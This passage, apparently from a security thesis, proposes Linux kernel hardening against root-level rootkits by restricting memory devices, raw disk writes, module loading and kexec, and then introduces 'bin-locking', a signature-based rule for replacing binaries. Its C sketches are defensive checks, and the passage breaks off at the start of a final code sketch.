To date, root or supervisor level control of a system has been closely associated with kernel level control. They are, in fact, not the same. All applications run as user and the kernel runs as privileged as far as the processor is concerned. The kernel is also in charge of enforcing the protections associated with root and other user accounts, while not having to follow them itself. Many kernel level rootkits have taken advantage of the extra power that comes from being part of the OS kernel and running with privileged processor control.
There exists, however, an opportunity to keep root and privileged CPU control distinct. Because there are only a few ways of elevating one's privileges between the two (as discussed above), one can concentrate on these select areas to increase the protection afforded to privileged code, protecting the kernel against threats by root level applications. To enforce the protection mechanism, one only needs to implement additional restrictions on the limited number of methods available for escalating from root application level control to privileged processor control. We do this by restricting access to the methods discussed above, and we document these restrictions in the subsections that follow. We believe that protecting the kernel in this way is beneficial. Malware exploitation of the kernel is a growing trend, and others in the security community have already made an effort to protect the kernel in complementary ways (we discuss such approaches in Section 4.6).
The protection mechanisms discussed in this chapter must all be implemented on a system in order to prevent code from gaining privileged processor permission. The mechanisms, however, do not need to be deployed across all installs of Linux in order for the benefits of protecting the kernel to be realized. The approach discussed in this thesis is incrementally deployable (at the granularity of a system).
Restricting Memory Access
In restricting access to privileged processor code, the first step we discuss is disabling write access to memory occupied by the OS kernel. On Linux, this involves restricting write access to /dev/mem and /dev/kmem. Restrictions to these device nodes have already been implemented in Linux by others, and need only be enabled. As of Linux version 2.6.26, the option exists to limit access through /dev/mem to only those areas of physical memory associated with I/O (e.g., the graphics card). No area of the physical address space associated with RAM can be written to through /dev/mem when the option is enabled. The ability to disable access to kernel memory through the /dev/kmem device node has also been configurable since 2.6.26. Before being introduced in the mainline Linux kernel, the options had been used in Fedora and other Red Hat kernels for 4 years without any known problems. /dev/mem cannot be disabled entirely as X (the graphical display manager typically used in Linux) uses it to communicate with the video card.
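The kernel-side check behind this option is conceptually simple. The sketch below is ours, with the helper page_frame_is_ram() standing in for the kernel's own memory-map lookup; it captures the spirit of the restriction: writes through /dev/mem are allowed only to page frames that are not backed by RAM, such as memory-mapped I/O regions.

    #include <stdbool.h>

    /* Hypothetical helper: true if the page frame number is backed by RAM
     * (as opposed to a memory-mapped device such as the video card). */
    bool page_frame_is_ram(unsigned long pfn);

    /* Consulted from the /dev/mem write and mmap paths for each page frame
     * touched by a request.  RAM (and therefore kernel and application
     * memory) is off limits; device memory such as the graphics aperture
     * remains accessible so that X continues to work. */
    bool devmem_write_allowed(unsigned long pfn)
    {
        if (page_frame_is_ram(pfn))
            return false;    /* deny: would expose kernel or application memory */
        return true;         /* allow: memory-mapped I/O only */
    }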
In Windows, writes directly to physical memory are accomplished using the \Device\PhysicalMemory device. This device, however, has been disabled by Microsoft since Windows 2003 SP1.
Restricting Access to Disk
Because the OS kernel is responsible for mediating all access to the underlying hardware on a system, it has the ability to control access to the underlying disks. By restricting access to those areas of the disk being used by swap, writes to swap can be prevented (and hence the integrity of kernel memory can be protected). To fully prevent the kernel from being modified, the areas of disk occupied by kernel modules, the core kernel, and the boot loader also need to be protected against arbitrary modification. Arbitrary writes to sectors of the disk occupied by any of these elements need to be restricted (i.e., a root level process must not be allowed to perform arbitrary writes to either /dev/hda or /dev/hda1 if they contain kernel-related elements).
Raw Disk Access
In restricting raw disk access, we implement a simple protection rule which is sufficient to protect all of the kernel elements from being modified: any partition actively being used by the OS kernel (either mounted or being used as swap) cannot be written to via the raw interface. This includes both partitions used as swap as well as any partition with a file-system that is currently mounted. We focus on raw writes in this thesis, not restricting raw read operations.
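A minimal sketch of this rule is given below, assuming hypothetical helpers partition_is_mounted() and partition_is_swap() that consult the kernel's mount table and active swap list; it would sit in the path servicing write requests issued through a raw block device node.

    #include <errno.h>
    #include <stdbool.h>

    struct block_partition;   /* opaque handle for a disk partition */

    /* Hypothetical helpers backed by the kernel's mount table and swap list. */
    bool partition_is_mounted(const struct block_partition *part);
    bool partition_is_swap(const struct block_partition *part);

    /* Called before a raw (file-system bypassing) write is issued to a
     * partition.  Raw reads are not restricted. */
    int raw_write_permitted(const struct block_partition *part)
    {
        if (partition_is_mounted(part) || partition_is_swap(part))
            return -EPERM;    /* partition is in active use by the kernel */
        return 0;             /* partition idle: raw writes allowed */
    }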
The disabling of raw writes to partitions that have been mounted has a side benefit. For those partitions that have been mounted, the kernel maintains a cache of recently used disk blocks to increase efficiency. Writes to the underlying disk for any block being cached by the OS are not guaranteed to be preserved, leading to potential corruption of the file-system.
While Linux currently does not implement such restrictions, such a restriction is beneficial from both a stability and a security standpoint. In our prototype, we extend the kernel to implement such a restriction. Microsoft's Windows Vista implements similar restrictions on accessing raw disk blocks. Because the boot loader generally exists outside the file-system that is exported to user-space applications, the act of disabling writes to the raw disk has the additional advantage of protecting the boot loader.
File Access
If raw disk writes are disabled, the only way left of modifying the swap file, kernel, modules, or boot loader on disk is through the standard open, read, write, and close system calls associated with files. Access control on these file-system operations is enforced by the OS kernel. To protect the swap file, the kernel need only prevent an application from opening and writing to the swap
file. In Linux, the ability to modify the swap file is not normally separate from the ability to modify other files on the system. To protect the swap file, the kernel needs to be extended to treat the swap file as special and disallow write attempts, even those done by root. Windows Vista already employs such an approach to prevent modifications to the page file.
The core kernel and related modules on disk are also commonly available as files on the file-system. While the naïve approach to protecting such elements would be to disallow all updates to these files, such a solution does not allow upgrades. To allow upgrades, an approach such as bin-locking, discussed in Chapter 5, can be used. Because the kernel and related module files are all binaries on disk, the bin-locking approach is well suited to protecting them against arbitrary modification. The boot loader can also be protected by treating the area of disk occupied by the boot loader as a binary file and using bin-locking.
Restricting Kernel Module Loading
To prevent new arbitrary code from executing on a system with privileged processor control, one must also restrict the loading of kernel modules. The commonly accepted way of restricting these is through the use of kernel module signing. While not currently accepted into the mainline Linux kernel, a patch does exist to implement kernel module signing. It enforces that only modules signed with the private key corresponding to the public key embedded in the OS kernel can be loaded to extend the kernel. The signature is contained within an ELF section. The public key is embedded into the core OS kernel at compile time. Only someone in possession of the private key can create a kernel module which verifies and is loaded into the running kernel. Windows Vista introduced a similar approach, preventing arbitrary kernel modules from being loaded.
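The load-time check amounts to verifying a detached signature carried in the module image against a key compiled into the kernel. The sketch below is ours (the helper names are hypothetical and do not correspond to the actual patch), but it reflects the flow described above: locate the signature, verify it over the rest of the module using the embedded public key, and reject the module otherwise.

    #include <errno.h>
    #include <stdbool.h>
    #include <stddef.h>

    struct public_key;                         /* key compiled into the kernel */
    extern const struct public_key kernel_module_key;

    /* Hypothetical helpers. */
    const void *find_signature_section(const void *image, size_t len,
                                       size_t *sig_len, size_t *signed_len);
    bool signature_verifies(const struct public_key *key,
                            const void *signed_data, size_t signed_len,
                            const void *sig, size_t sig_len);

    /* Returns 0 if the module may be loaded, -EPERM otherwise. */
    int module_signature_ok(const void *image, size_t len)
    {
        size_t sig_len, signed_len;
        const void *sig = find_signature_section(image, len, &sig_len, &signed_len);

        if (sig == NULL)
            return -EPERM;    /* unsigned module: rejected outright */

        if (!signature_verifies(&kernel_module_key, image, signed_len, sig, sig_len))
            return -EPERM;    /* signature does not match the embedded key */

        return 0;             /* signed by the holder of the private key */
    }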
Updating the Kernel Image
While only an issue when the machine is rebooted, updating of the kernel image is nevertheless still an avenue through which the OS kernel can be modified. To prevent modifications to the OS kernel, an approach like bin-locking (introduced in Chapter 5) can be used to restrict updating the kernel image. We discuss such an approach above.
To prevent updating the running kernel image through kexec, we must limit
the kernels that are allowed to be started by calling the kexec system call. In limiting the kernels allowed to be run through kexec, we prevent arbitrary code from running with privileged processor control. In current (unmodified) kernels, kexec is disabled by default, and is enabled by the compile option CONFIG_KEXEC. Furthermore, the option is only available for x86 processors.
While certain hardware configurations may provide additional methods of gaining write access to kernel memory, we believe that the OS kernel device drivers responsible for the underlying hardware can be modified to remove vulnerabilities caused by specific hardware. This may involve restricting both the interface and operations exposed to applications. This requires further exploration, but is beyond the scope of this thesis. The exact method for ensuring hardware does not allow additional code to run with privileged processor control is highly dependent on the exact hardware being examined.
Many have decided to abandon hope in securing the kernel from within, declaring it instead intrinsically insecure and electing to use the hypervisor level to implement security mechanisms designed to protect the kernel (see Section 4.6). The hypervisor is also used to provide isolation between the kernel and the underlying hardware. The aim of isolating the underlying hardware from the operating system has yielded benefits in virtualization and server consolidation, allowing one physical machine to run multiple operating system instances simultaneously. The aim of protecting the operating system against attack by applications using virtualization, however, to date has only been discussed in academic circles (to our knowledge).
In the spirit of a guardian enforced mandatory access control policy, we recall the execute disable flag introduced to combat code injection buffer overflow attacks (discussed earlier in this thesis). The solution worked not because it was the most complete (it was not; it only worked at a page level and only protected against code injection buffer overflow attacks), but because it was simple and widely deployed. Instead of depending on an entirely new protection level to protect the kernel, we focus on cutting off the obvious methods through a few simple mechanisms, forcing malware to exploit a vulnerability (which is much harder) in order to gain access. Any of the more complete methods discussed in Section 4.6 can be used in combination with the protection mechanisms we propose in Section 4.2 for a defence in depth approach.
Detection versus Prevention
In enforcing the separation between root and privileged processor control, we prevent many current kernel level rootkits from working on a system. While there are many actions that can be taken once a kernel rootkit has privileged processor permission, the ways of getting that permission are very few.
The other approach that can be taken toward addressing kernel rootkits is to attempt to detect them, either as they access the interfaces to gain privileged processor control, or once they are in the kernel. Detection, however, is a reactive protection method. We believe that when possible, it is much better to prevent the threat from occurring rather than to attempt to detect it. In our case, the ability for rootkits to gain privileged processor control can be prevented, and hence detection approaches may not be necessary. Prevention approaches work best when the interface is not commonly used by legitimate software (which in this case is true, as discussed below). We discuss the many methods that have been proposed to detect privileged processor control rootkits in Section 4.6.
Restriction of Raw Disk Writes
The additional protection mechanism most likely to affect end users (or the applications they are likely to run) is that of disallowing raw writes to partitions being actively used by the OS kernel (including both swap and file-system partitions). This protection mechanism is necessary to prevent applications from bypassing the standard file access controls which have been imposed by the OS kernel. It also prevents swap from being written to as a method for modifying code run with privileged processor permission.
There are a number of activities that are performed on all systems using the raw disk interface provided by the OS kernel. We now discuss each of these and how they are affected by disallowing raw writes.
1. Disk Partitioning - Disk partitioning involves allocating areas of a disk for use by different file-systems. Creating and modifying disk partitions requires write access to the underlying raw device by the partitioning software. This operation is inherently dangerous, and can be very destructive to data on the partitions. Regardless of the protection mechanisms proposed in this thesis, modifying the partition table of a drive which is currently mounted is still very dangerous. We therefore see restricting the modification of partitions on drives which are mounted as beneficial.
2. Partition Formatting - Formatting involves creating a new file-system on a partition created as discussed above. Creating a new file-system on a partition which is currently being used by the OS kernel is never recommended, being likely to lead to both corruption and data loss, either in swap (if the partition is currently being used for swap space) or on the file-system which was mounted at the time of the format operation. Again, regardless of the additional protection mechanisms presented in this thesis, formatting a mounted partition is very dangerous.
3. File-System Checks - A file-system check involves checking the consistency of a file-system, ensuring it is free of errors. As long as a file-system check does not modify an active partition, the consistency check can be considered a relatively safe operation (and indeed would be allowed by the new protection mechanism, since writes would not be performed). File-system checks that write to a mounted partition are inherently dangerous and should not be performed. Current approaches for checking a mounted file-system involve requesting that all modifications be performed by the kernel, to avoid file-system corruption.
In all cases above, the ability to perform raw disk writes, combined with the fact that the partition accessed is also being used by the kernel, leads to a dangerous scenario. The ability to restrict raw disk writes to mounted partitions is beneficial, regardless of whether malware is involved. Indeed, users who try to perform a file-system check on a mounted partition often end up with corrupted data. We view the addition of a protection mechanism that addresses these dangerous activities as advantageous.
By further limiting the interface between user and privileged processor control, additional restrictions are introduced where previously developers were unrestricted. The restrictions, however, are being placed on aspects of the system very seldom (if ever) used by an end-user or the applications they are likely to run. Kernel debuggers, one application broken by the restrictions on being able to write to privileged kernel memory, are very unlikely to be run by end users. For the small subset of users who must use kernel debuggers or modify the raw file-system without rebooting, the protection mechanisms discussed in this chapter are not appropriate. Most end users, however, do not need to use kernel debuggers. End-users are also accustomed to having to reboot when partitioning disks, formatting, or repairing file-systems.
Raw Disk Access
While the inability to perform raw disk access may be viewed as a limitation of our system, we actually view it as a benefit, as discussed above.
A Prototype Implementation
To test the feasibility of better enforcing the protection barrier between root level and privileged processor control, we implemented the protections discussed in Section 4.2. This included preventing raw disk access on partitions that were mounted, disallowing kernel module loading, and restricting access to physical memory interfaces. Our prototype implementation used Debian 4.0 for applications and Linux kernel version 2.6.25, modified to enforce the additional protection mechanisms.
The boot process was modified on the test system to initialize kernel data structures that limit raw writes (to both mounted partitions and the swap partition). For memory access, /dev/kmem was disabled and /dev/mem was restricted to only allow writing to areas of physical memory not occupied by RAM. In an alternate prototype, which we discuss in detail in a later chapter, we test preventing modification of the kernel or associated modules on disk.
Restricting Memory Access
In the prototype Linux kernel, we enabled the pre-existing kernel options for restricting access to /dev/kmem and limiting the memory writable through /dev/mem. We disabled the running of arbitrary new kernels by omitting the kexec system call (CONFIG_KEXEC was set to 'n' in the kernel configuration).
Restricting Kernel Module Loading
In the prototype Linux kernel, we disabled kernel module loading, since our goal was to determine whether everyday user activities would be influenced by the increased kernel protection mechanisms. An alternate approach is to restrict kernel module loading based on signatures, as already discussed and implemented by Kroah-Hartman.
Disabling Raw Disk Access
To test the restriction of raw writes to mounted partitions, we modified the prototype Linux kernel. We export a new syscontrol from the modified kernel, allowing a user space process to set which partitions should prevent (disable) raw disk writes. A syscontrol is a single pseudo-file (a file which does not exist on disk) that exposes kernel configuration to user space. In this case, the list of protected partitions can be read by user-space applications, and a new partition can be appended to the list by writing to the pseudo-file. Because the syscontrol only supports appending to the list maintained by the kernel, the only way to remove a partition from the list is to reboot the system, clearing the list. As part of the boot-up process, the list of partitions for which raw disk access is disabled is written back into the syscontrol (after the initial fsck/file-system check). The list of partitions written to the syscontrol in the prototype included the swap partition (to prevent attacks against kernel memory). If any partition on a disk is being protected, the prototype kernel also disables raw writes to the file representing the entire drive. In order for malware to enable raw disk writes, it must modify the start-up process to disable initialization of the syscontrol and reboot the system. While we discuss protecting the startup process in later chapters, we note that this avenue for attack is specific to our prototype implementation, not a general problem with disabling raw disk writes.
In the implementation, the restriction on raw disk writes was implemented as a user-specified list. As an improvement, the file-system code in the Linux kernel could be modified to automatically prevent raw writes as the partition is mounted.
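The append-only behaviour of the list is the essential property. The following sketch uses hypothetical names in place of the kernel's pseudo-file plumbing: the write handler can only add entries, and nothing short of a reboot clears the list, matching the prototype's behaviour.

    #include <stdbool.h>
    #include <string.h>

    #define MAX_PROTECTED 32
    #define NAME_LEN      64

    /* Partitions for which raw writes are disabled.  Populated at boot by
     * user space writing to the pseudo-file; cleared only by rebooting. */
    static char protected_parts[MAX_PROTECTED][NAME_LEN];
    static int  protected_count;

    /* Write handler for the pseudo-file: append only, no removal path. */
    int protect_partition(const char *name)
    {
        if (protected_count >= MAX_PROTECTED)
            return -1;                                   /* table full */
        strncpy(protected_parts[protected_count], name, NAME_LEN - 1);
        protected_parts[protected_count][NAME_LEN - 1] = '\0';
        protected_count++;
        return 0;
    }

    /* Consulted by the raw-write path (see the earlier sketch). */
    bool partition_is_protected(const char *name)
    {
        for (int i = 0; i < protected_count; i++)
            if (strcmp(protected_parts[i], name) == 0)
                return true;
        return false;
    }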
Protection Against Current Rootkits
To verify that the prototype system was able to defend against OS kernel rootkit malware, we attempted to install several Linux rootkits. We selected two kernel-based rootkits (suckit2 and mood-nt), attempting to install them on the system using the provided install programs. Both failed to install because of disabled write access to /dev/kmem. The fact that both rootkits depended on /dev/kmem gives weight to disabling access to kernel memory. We believe the additional mechanisms proposed in this chapter raise the bar significantly for an attacker attempting to compromise the kernel.
The prototype discussed in this chapter was implemented as a component of the ∼2000 line bin-locking kernel module discussed in Chapter 5; the performance overhead of the kernel module, including bin-locking, is also discussed there.
Effect on Applications
During development and use of the prototype (including watching videos, listening to music, browsing the web, reading e-mail, and writing a paper), we did not encounter any programs that were blocked by the kernel interface restrictions implemented in the prototype. We did not encounter any program (other than malware) which attempted to write directly to swap or kernel memory.
Related Work
We now discuss related work.
SELinux Reference Policy
We start our discussion by examining the SELinux reference policy (we examined version 2.20090730) and its method for protecting against each of the methods of gaining privileged processor control discussed earlier in this chapter. We note that because SELinux is a default-deny policy system, much of the policy itself focuses on granting permissions, rather than documenting why a permission is not granted. While many of the methods for gaining privileged processor control are denied by the SELinux reference policy, it is because these permissions are not required in order for applications to run correctly.
1. Physical Memory Access - In restricting access to kernel memory, the reference policy groups together under the same permission access to the device nodes /dev/mergemem, /dev/oldmem, /dev/kmem, /dev/mem, and /dev/port. Applications such as kudzu (which detects and configures new and/or changed hardware on the system), vbetool (which communicates with the video BIOS), and xserver (which provides the graphical interface in Linux) are all granted write access to these device nodes. Of the three, kudzu has been deprecated by Red Hat, and the other two
use the privilege to access the video card, leading to the possibility that the SELinux reference policy could be made finer-grained by focusing on providing access to just the video card. The current status of each device node is as follows:
• /dev/kmem - Provides access to kernel memory. Enabled by the kernel configuration option CONFIG_DEVKMEM (see above) and enabled in the standard Debian (v5.0) build of the kernel.
• /dev/mem - Provides access to all system memory. Restricted to portions of the memory address space not associated with RAM by enabling the kernel option CONFIG_NONPROMISC_DEVMEM (which was renamed to CONFIG_STRICT_DEVMEM in kernel 2.6.27). This kernel option is not set in Debian v5.0.
• /dev/mergemem - Used for combining identical physical pages of memory in an effort to reduce memory consumption. While the documentation of the Linux kernel was updated in 2.1.115 to include this device node, the related code appears to never have been accepted into the main Linux kernel tree. Mergemem does not appear to have been actively maintained since January 1999.
• /dev/oldmem - Used by crashdump kernels to access the memory of the kernel that crashed. Useful for debugging the kernel, and can be disabled on production machines. Enabled by the CONFIG_CRASH_DUMP configuration option, but disabled in the standard Debian (v5.0) build of the kernel.
• /dev/port - Provides access to I/O ports. Enabled by the kernel configuration option CONFIG_DEVPORT, and enabled in the standard Debian (v5.0) build of the kernel.
With physical memory access, the SELinux reference policy does not make the distinction between kernels that have been compiled with the raw memory options discussed above and those that have not. Because SELinux operates at the object level, it relies on the objects themselves being specific enough to limit permission correctly. Without restrictions on where data can be written using /dev/mem, providing write access to video memory has the side effect of providing write access to kernel memory.
2. Kernel Modules - The ability to load kernel modules is granted to a single program in the SELinux reference policy: insmod. The ability to run insmod is then restricted, in effect preventing arbitrary kernel modules from being loaded by restricting what subjects are allowed to execute the insmod binary. In the reference policy, subjects with the bootloader_t type are allowed to execute insmod.
3. Swap - In the SELinux reference policy, the ability to access swap, if it exists as a physical partition on the hard drive, is limited to those programs allowed to perform raw writes to fixed disks. Of all the methods of obtaining privileged processor control, being allowed to perform raw writes to the hard drive is the only one documented in the reference policy as allowing SELinux security protections to be bypassed.
If swap is a file instead of a partition, there are no specific rules in the reference policy for restricting write access to the active swap file. We suspect it is up to the individual deploying SELinux to ensure that the swap file cannot be written to.
4. Kernel Image - The ability to replace the kernel image on disk (and, indeed, the bootloader or kernel modules) is determined through a number of different actions. To prevent the updating of the raw disk blocks corresponding to these files, the SELinux reference policy has rules for restricting raw disk access (as discussed in point 3). To prevent updating these files at the file-system layer, the SELinux reference policy restricts write access to the bootloader, kernel image, and kernel modules separately. A subject given write access to the bootloader may not necessarily have write access to the kernel modules. Replacing the running kernel image by using kexec is not mentioned in the SELinux reference policy.
Within the SELinux reference policy, there is no overarching privilege that, if given to a process, allows that process to obtain privileged processor control through some method. In keeping with the general SELinux philosophy of least privilege, the developers of the reference policy have attempted to restrict, for each object and subject, the actions that subject can perform on the object, without making it clear that allowing certain of these actions grants arbitrary additional privileges because the subject can gain privileged processor control.
Microsoft's Windows Vista already implements many of the kernel access protections discussed in this chapter, including restrictions on write access to raw drive partitions, swap, and kernel memory. The success of such approaches in the Windows environment provides strong evidence that such restrictions are not inherently detrimental to typical system use. Our discussion
focuses on providing a complete view of the required protection mechanisms that must be implemented to protect the kernel from malware. We provide similar protection in the Linux environment, which has traditionally provided a more open interface to developers. We also build on some of the mechanisms provided by Windows, proposing a method for selectively allowing updates to the kernel and module files on disk. We believe the mechanisms discussed in this chapter provide important new protection within the Linux kernel while still allowing it to be open (any individual can still compile and use their own kernel). The approach taken in this chapter relies on bin-locking (Chapter 5), but can also be modified to rely on configd (discussed in a later chapter). Both bin-locking and configd rely on a secure kernel, which the work in this chapter supports.
Other Related Work
By far, the most common approach for detecting OS kernel level malware is to have a detection mechanism installed at a different protection level (recall Figure 4.1). Copilot, discussed by Petroni et al., operates as a distinct system device on the system. It monitors the OS kernel in an attempt to detect changes to static kernel elements such as privileged processor code. It also provides a mechanism for partial restoration of changes made by malicious kernel rootkits. Petroni et al. likewise use a system device to detect changes in the OS kernel, but concentrate on protecting dynamic data structures.
Wang et al. discuss an approach that attempts to detect software that
exists for the purpose of hiding certain resources on a system (i.e., ghostware).
It compares the results of examining certain aspects of a system from two different angles to determine if there are any differences. These snapshots of system state are taken at the same time. Their approach resides at the application privilege level and examines the results returned by the high level OS kernel API to specific queries. A second set of requests is then performed against the low level OS kernel API and compared to the first to determine if there are any discrepancies. Like Copilot above, this technique detects ghostware after it has infected the OS kernel, rather than preventing the infection.
Kruegel et al. present an approach for detecting at load time whether
a kernel module is malicious through binary analysis. This approach is the most similar to the protection mechanisms proposed in this chapter in that it attempts to prevent the loading of malicious code. Running in the OS kernel, it also relies on the protections against swap and physical memory writes as discussed in Section 4.2. This approach can be used instead of kernel module signing as a method to protect the running OS kernel against the insertion of additional code which runs with privileged processor permission.
Carbone et al. take a snapshot of memory allocated to the running kernel and attempt to map all dynamic data contained within it. Using the memory snapshot and the corresponding kernel source code, they create a directed graph of memory usage within the snapshot. They then check function pointers and detect hidden objects as a method for detecting kernel rootkits. The approach operates offline, and works to detect rather than prevent rootkits.
Several approaches have leveraged recent advances in virtual machine monitors (VMMs) to detect kernel malware. These approaches leverage the VMM as a way of protecting the detection mechanism against malware which has managed to compromise the OS kernel, while still allowing complete analysis of the lower protection levels of the software stack.
Because the interface between the OS kernel and VMM is similar to that
between the VMM and the underlying hardware, higher level knowledge about OS kernel structures must be reconstructed from what is seen at the hardware layer. Many approaches refer to this as introspection – rebuilding the state of the OS kernel at the VMM layer in order to obtain a higher layer understanding.
Because work involving VMMs assumes that it is not possible to secure the OS kernel, such approaches are forced to examine the OS kernel from a higher protection level. We believe that the protections discussed in this chapter show that it is possible to separate the OS kernel from root level processes, re-establishing trust in the kernel. In trusting the kernel, we allow many of the protection mechanisms developed to be moved from the VMM back into the OS kernel, making introspection unnecessary.
One argument for declaring the OS kernel insecure is that there are many
bugs that allow applications to compromise the kernel. While it is true that the number of lines of code in a modern kernel is high, we do not believe the discovery of bugs to be sufficient justification for declaring the kernel unsecurable. Indeed, research on finding and fixing software vulnerabilities through static and dynamic analysis presents an opportunity for reducing these vulnerabilities. As hypervisors become more complex, it is increasingly likely their security will be equally affected by bugs.
In trusted computing platforms such as AEGIS, the kernel's digital signature is verified by the boot-loader before it is loaded. Because the kernel currently exports interfaces which allow it to be updated by user-space applications, a cryptographic hash of the kernel at boot time is insufficient to verify the integrity of the currently running kernel. In order to verify that the running kernel has not been modified, the integrity verification must include all applications which have ever run on the system since boot. We believe such an approach is overly heavyweight compared to disabling privileged processor access on end-user desktops.
Final Remarks
Many of the elements presented in this chapter for restricting access to the kernel have previously been proposed individually in some form or another. The combination of all these elements, however, provides what we believe to be complete protection against root level processes being able to obtain privileged processor control. Protecting the kernel against compromise is a goal shared by many other researchers, as evidenced by the large volume of research published on the topic. This chapter takes the approach of protecting the kernel through prevention, rather than detection. In taking the avenue of preventing access to the kernel, we parallel the work of execute disable, using processor features to prevent, rather than try to detect, an attack. The approach discussed in this chapter does not rely on the end-user for enforcement, is enforced on all applications deployed for the system, and is implemented by a guardian (the OS developer). It therefore follows the thesis goal of providing a guardian enforced mandatory access control mechanism which can be deployed.
Bin-Locking: Selectively Restricting Updates to Binaries
In this chapter, we describe a file-system protection mechanism designed to limit modifications to binaries – library and executable files on disk. We focus on establishing a beachhead against malware by protecting binary files – a type of file very rarely modified by a user. Our proposal, however, extends to other types of files not modified by the user of a system.
In current computing environments, software applications written by many different authors all coexist on disk, being installed at various times by the user. Each application normally includes a number of program binaries along with some associated libraries. While the installation of a new application will normally not overwrite previously installed binaries, permission to modify all binaries is common. Indeed, this raises a problem: any application installer (or even application) running with sufficient privileges can modify any other application on disk. Application installers are routinely given these privileges during software upgrade or install (i.e., almost all installers run as administrator or root, giving complete access to the system). Some applications even run with administrator privileges during normal operation, for a variety of reasons and despite the best efforts and countless recommendations against this practice over the years. The frequent running of applications (including their installers) as administrator leads to a situation in which a single application can modify any other application binary on disk. Normally, applications do not abuse this privilege to modify the binaries belonging to other applications. Malware, however, does not traditionally respect the implicit expectations followed by normal software, and uses the ability to modify other binaries as a convenient installation vector. This situation is not new. Already in 1986, the Virdem virus was infecting executables in order to spread itself; more recently, rootkits have used binary modification to help escape detection.
The Protection Mechanism
Our approach is to associate a digital signature with each library file and executable, which is checked by the kernel when an update to the binary is attempted by software. No centralized (or other) public key infrastructure is involved, although an important design aspect is a relationship between the signature on the new binary and a public key embedded in the (old) binary being replaced. We use additional kernel protections to restrict modification of these signed binaries on a system. The core technology is based on a simple application of code-signing or self-signed executables. We use the term bin-locking (short for binary-locking) to refer to our proposal, to avoid confusion with other code signing mechanisms. The proposed system allows binaries to be transparently and securely upgraded, facilitating the application of security patches.
At the core of our proposal is a simple but well-planned use of digital signatures, designed to protect a binary against unauthorized modifications. To restrict who can modify (or replace) a binary on disk, we enforce one simple protection rule: a library file or executable on disk can only be replaced by a library or executable containing a digital signature verifiable using any public key in the previously installed binary having the same file name. Binaries protected by the bin-locking proposal have embedded within them a set of digital signatures along with a set of corresponding public keys. (The portion of the file holding the digital signature itself is not included in the range of the signature, to prevent a recursive definition; the public key, however, is integrity-protected by the signature.) We propose supporting a few standardized digital signature algorithms (the particular choice is specified alongside and protected by the digital signature). The kernel, upon finding a digital signature (in the bin-locking section of the binary), will restrict replacement of the binary to those new binaries containing a digital signature which can be verified using any key in the currently installed binary. If the signature can be verified (or the currently installed binary is not bin-locked), then the replacement is allowed. Otherwise, the replacement is denied by the kernel and the original binary remains unmodified on disk. Only one signature needs to be verified in order for the replacement operation to succeed.
Deployment is incremental – binaries not bin-locked can be replaced without
1The portion of the file holding the digital signature itself is not included in the range of the
signature, to prevent a recursive definition. The public key, however, is integrity-protected bythe signature.
Chapter 5. Bin-Locking
restriction (which is how most systems currently operate), but once a binary isbin-locked it must be replaced by a bin-locked binary. The proposed method isquite different than SDSI/SPKI We trust keys only in a very limitedsetting (for replacing a binary which was signed with the same key). We do notuse names or certificates.
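For concreteness, the replacement rule can be written as a small decision procedure. The sketch below is a user-space illustration only, assuming hypothetical types and a stub verification routine (binary_t, bl_verify_signature); in the actual proposal the check is performed by the kernel against the parsed bin-locking section of each file.

    #include <stdbool.h>
    #include <stddef.h>

    /* Hypothetical in-memory view of a binary's bin-locking data. */
    typedef struct {
        size_t num_pubkeys;      /* public keys embedded in the binary        */
        size_t num_signatures;   /* digital signatures embedded in the binary */
    } binary_t;

    /* Stub: returns true if signature 'sig_idx' of 'newbin' verifies under
     * public key 'key_idx' of 'oldbin'.  A real implementation would hash the
     * new file and run DSA (or another supported algorithm) verification. */
    static bool bl_verify_signature(const binary_t *newbin, size_t sig_idx,
                                    const binary_t *oldbin, size_t key_idx)
    {
        (void)newbin; (void)sig_idx; (void)oldbin; (void)key_idx;
        return false;                       /* placeholder */
    }

    static bool is_bin_locked(const binary_t *b)
    {
        return b != NULL && b->num_signatures > 0;
    }

    /* The core rule: replacement is allowed if the old file is not bin-locked,
     * or if ANY signature in the new file verifies under ANY key embedded in
     * the old file.  One matching signature is sufficient. */
    bool bl_replace_allowed(const binary_t *oldbin, const binary_t *newbin)
    {
        if (!is_bin_locked(oldbin))
            return true;                    /* incremental deployment */
        if (newbin == NULL)
            return false;                   /* bare deletes and moves are refused */
        for (size_t s = 0; s < newbin->num_signatures; s++)
            for (size_t k = 0; k < oldbin->num_pubkeys; k++)
                if (bl_verify_signature(newbin, s, oldbin, k))
                    return true;
        return false;
    }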
Over time, inevitably, signing keys used for bin-locking will be lost or compromised. Both situations can be ameliorated by allowing, as an option, the embedding of multiple verification public keys in a binary file. If one corresponding private key is lost, the other(s) can be used to sign a subsequent version of the file (which can also introduce new keys). We do not specify any conditions on who or what controls the private keys corresponding to these additional verification public keys, but many options exist including community trusted organizations or trusted friends who function as backups. While we mandate no specific infrastructure for key revocation, pro-actively installing a new version of a file which does not allow future versions signed with the previous key (i.e., which excludes the old verification public key(s) from those embedded in the new version) prevents a compromised key from being a threat indefinitely. Because each file can be signed with a different key, the effect of a compromised key can be limited. When or how frequently to change keys which are not known to have been compromised is a question we do not focus on in this thesis.
Trust Model
In the proposed system, it is assumed that a malware author does not have physical access to the end-user machine and that malware does not have access to the private signing keys, nor have kernel level control of the target machine.² The protection mechanism discussed elsewhere in this thesis is suitable for protecting the kernel.

²We define the kernel (and hence kernel level control) to include only those aspects running with elevated CPU privileges (ring 0 privileges on x86) – this definition of kernel does not include core system libraries installed alongside the operating system but run in user space.

A Generic Approach

At its base, the bin-locking approach restricts updates to an object based on the signature verification public keys embedded in the object. In our discussion thus far, we have restricted objects to be binary files because they are not commonly modified by users and have a defined structure. The bin-locking approach, however, can be expanded to any type of object not modified by end users. This includes data files used by an application (e.g., fonts and graphics).
Objects can also be complete application packages (including all the files contained within, but not user data files created with the application) – this is the approach taken by Android, discussed in the related work section of this chapter.
Interdependence on Signing Keys
The parts of the binary file signed in creating a bin-locked file include all structure surrounding the signatures, including the bin-locking section headers, public key prefixes, public keys, and any other element except the actual digital signature. Because the data used to generate each digital signature includes all public keys contained in the file, a single public key or signature cannot be replaced in a bin-locked file signed by multiple parties without other parties having to re-sign the file. This approach is necessary because a single matching signature is considered sufficient in updating a binary file. If a bin-locked file could be signed with an additional signature while still being legitimate for those keys already embedded, an attacker could take control of a binary file by appending a new signature to an already bin-locked file.
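The signed range can be made concrete with a short sketch. The sig_range_t descriptor and the digest routine below are illustrative placeholders: the whole file is hashed with the bytes of each signature zeroed, so headers, key prefixes, and public keys are covered by every signature while the signatures themselves are not.

    #include <stddef.h>
    #include <stdlib.h>
    #include <string.h>

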